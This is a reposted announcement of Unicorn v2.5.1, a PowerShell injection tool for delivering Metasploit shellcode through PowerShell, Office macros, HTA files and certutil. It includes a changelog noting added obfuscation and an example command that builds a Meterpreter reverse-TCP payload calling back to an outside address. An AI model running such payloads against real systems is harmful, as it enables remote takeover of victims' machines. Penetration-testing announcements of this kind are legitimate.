Magic Unicorn Attack Vector v2.5.1 – PowerShell downgrade attack and exploitation tool.

Changelog unicorn v2.5.1:
* minor string format cleanup
* pep8 formatting

version 2.5
* complete rehaul on macro injection – adds heavy obfsucation through the entire codebase
* changed generate_random_strings to remove any digits – this was due to macro strings not supporting numeric values.startswith()
* code improvements and efficiency in vba code

version 2.4.3
* fixed macro injection with new obfuscated method
* added noprofile to command when using macro injection
* changed AutoOpen to Auto_Open
* fixed instructions to reflect

unicorn v2.5.1

unicorn v2.4

unicorn v2.3.3

unicorn v2.3.3

Unicorn is a PowerShell injection tool utilizing Matthew Graebers attack and expanded to automatically downgrade the process if a 64 bit platform is detected. This is useful in order to ensure that we can deliver a payload with just one set of shellcode instructions. This will work on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.

Requirements:
+ Metasploit Framework

Attack Options:
+ POWERSHELL ATTACK INSTRUCTIONS
+ MACRO ATTACK INSTRUCTIONS
+ HTA ATTACK INSTRUCTIONS
+ CERUTIL Attack Instruction
+ Custom PS1 Attack Instructions

Usage:

git clone https://github.com/trustedsec/unicorn && cd unicorn
./unicorn --help
Update:
cd unicorn
git pull origin master

Example use:
python unicorn.py payload reverse_ipaddr port Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443

Download : Master.zip | Clone Url
Source: TrustSec  | https://www.trustedsec.com/ | Our Post Before

Source: Security List Network™ @ February 23, 2017 at 07:13PM

0
Share